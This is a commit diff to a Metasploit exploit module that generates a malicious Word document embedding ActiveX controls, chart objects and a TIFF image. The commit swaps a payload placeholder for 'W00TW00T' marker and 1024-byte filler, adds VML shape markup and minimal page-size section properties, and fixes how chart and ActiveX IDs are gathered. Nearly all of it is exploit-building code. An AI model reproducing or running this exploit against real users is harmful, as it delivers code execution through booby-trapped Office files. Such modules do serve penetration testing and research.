More progress
parent
56d1c545e7
commit
8382d31f46
|
@ -201,7 +201,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
mscd << [0x00000003].pack('V')
|
mscd << [0x00000003].pack('V')
|
||||||
mscd << [0xfffffffe].pack('V')
|
mscd << [0xfffffffe].pack('V')
|
||||||
mscd << [0xffffffff].pack('V') * 52
|
mscd << [0xffffffff].pack('V') * 52
|
||||||
# mscd << "PAYLOAD"
|
|
||||||
|
mscd << "W00TW00T"
|
||||||
|
mscd << "A" * 1024
|
||||||
|
|
||||||
mscd
|
mscd
|
||||||
end
|
end
|
||||||
|
@ -344,8 +346,37 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'w:shapeid' =>"_x0000_i10#{rid.to_s}"
|
'w:shapeid' =>"_x0000_i10#{rid.to_s}"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
shapetype_attrs = {
|
||||||
|
'id' => "rId#{rid.to_s}",
|
||||||
|
'coordsize' => "21600,21600",
|
||||||
|
'o:spt' => "75",
|
||||||
|
'o:preferrelative' => "t",
|
||||||
|
'path' => "m@4@5l@4@11@9@11@9@5xe",
|
||||||
|
'filled' => "f",
|
||||||
|
'stroked' => "f"
|
||||||
|
}
|
||||||
|
|
||||||
xml.r do
|
xml.r do
|
||||||
xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
|
xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
|
||||||
|
xml['v'].shapetype(shapetype_attrs) do
|
||||||
|
xml['v'].stroke({'joinstyle'=>'miter'})
|
||||||
|
xml['v'].formulas do
|
||||||
|
xml['v'].f({'eqn' => "if lineDrawn pixelLineWidth 0"})
|
||||||
|
xml['v'].f({'eqn' => "sum @0 1 0"})
|
||||||
|
xml['v'].f({'eqn' => "sum 0 0 @1"})
|
||||||
|
xml['v'].f({'eqn' => "prod @2 1 2"})
|
||||||
|
xml['v'].f({'eqn' => "prod @3 21600 pixelWidth"})
|
||||||
|
xml['v'].f({'eqn' => "prod @3 21600 pixelHeight"})
|
||||||
|
xml['v'].f({'eqn' => "sum @0 0 1"})
|
||||||
|
xml['v'].f({'eqn' => "prod @6 1 2"})
|
||||||
|
xml['v'].f({'eqn' => "prod @7 21600 pixelWidth"})
|
||||||
|
xml['v'].f({'eqn' => "sum @8 21600 0"})
|
||||||
|
xml['v'].f({'eqn' => "prod @7 21600 pixelHeight"})
|
||||||
|
xml['v'].f({'eqn' => "sum @10 21600 0"})
|
||||||
|
end
|
||||||
|
xml['v'].path({'o:extrusionok' => "f", 'gradientshapeok' => "t", 'o:connecttype' => "rect"})
|
||||||
|
xml['o'].lock({'v:ext' => "edit", 'aspectratio' => "t"})
|
||||||
|
end
|
||||||
xml['v'].shape(shape_attrs)
|
xml['v'].shape(shape_attrs)
|
||||||
xml['w'].control(control_attrs)
|
xml['w'].control(control_attrs)
|
||||||
end
|
end
|
||||||
|
@ -410,6 +441,36 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
#
|
||||||
|
# Creates a <w:sectPr> tag
|
||||||
|
# @param xml [Element]
|
||||||
|
#
|
||||||
|
def create_secpr(xml)
|
||||||
|
sectpr_attrs = {
|
||||||
|
'w:rsidR' => "00D15BD0",
|
||||||
|
'w:rsidRPr' => "00D15BD0",
|
||||||
|
'w:rsidSect' => "00F8254F"
|
||||||
|
}
|
||||||
|
|
||||||
|
pgmar_attrs = {
|
||||||
|
'w:top' => "1",
|
||||||
|
'w:right' => "1",
|
||||||
|
'w:bottom' => "1",
|
||||||
|
'w:left' => "1",
|
||||||
|
'w:header' => "1",
|
||||||
|
'w:footer' => "1",
|
||||||
|
'w:gutter' => "0"
|
||||||
|
}
|
||||||
|
|
||||||
|
xml['w'].sectPr(sectpr_attrs) do
|
||||||
|
xml['w'].pgSz({'w:w'=>"1", 'w:h'=>"1"})
|
||||||
|
xml['w'].pgMar(pgmar_attrs)
|
||||||
|
xml['w'].cols({'w:space'=>"1"})
|
||||||
|
xml['w'].docGrid({'w:linePitch'=>"1"})
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Creates a document.xml file
|
# Creates a document.xml file
|
||||||
# @param pre_defs [Array]
|
# @param pre_defs [Array]
|
||||||
|
@ -420,7 +481,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
|
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
|
||||||
# Get all the required pre-defs
|
# Get all the required pre-defs
|
||||||
chart_rids = []
|
chart_rids = []
|
||||||
pre_defs.select { |e| chart_rids << e[:id] }
|
pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}
|
||||||
|
|
||||||
# Get all the ActiveX RIDs
|
# Get all the ActiveX RIDs
|
||||||
ax_rids = []
|
ax_rids = []
|
||||||
|
@ -461,10 +522,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
xml.rPr do
|
xml.rPr do
|
||||||
xml.lang({'w:val' => "en-US"})
|
xml.lang({'w:val' => "en-US"})
|
||||||
end
|
end
|
||||||
|
end
|
||||||
|
|
||||||
ax_rids.each do |rid|
|
ax_rids.each do |rid|
|
||||||
create_ax_run_element(xml, rid)
|
create_ax_run_element(xml, rid)
|
||||||
end
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -480,6 +541,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
create_pic_run_element(xml, tiff_rid)
|
create_pic_run_element(xml, tiff_rid)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
create_secpr(xml)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -502,16 +564,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def make_contenttype_xml(overrides)
|
def make_contenttype_xml(overrides)
|
||||||
contenttypes = [
|
contenttypes = [
|
||||||
{
|
{
|
||||||
:Extension =>"rels",
|
:Extension => "rels",
|
||||||
:ContentType =>"application/vnd.openxmlformats-package.relationships+xml"
|
:ContentType => "application/vnd.openxmlformats-package.relationships+xml"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
:Extension =>"xml",
|
:Extension => "xml",
|
||||||
:ContentType =>"application/xml"
|
:ContentType => "application/xml"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
:Extension =>"jpeg",
|
:Extension => "jpeg",
|
||||||
:Contenttype =>"image/jpeg"
|
:Contenttype => "image/jpeg"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
:Extension => "bin",
|
:Extension => "bin",
|
||||||
|
|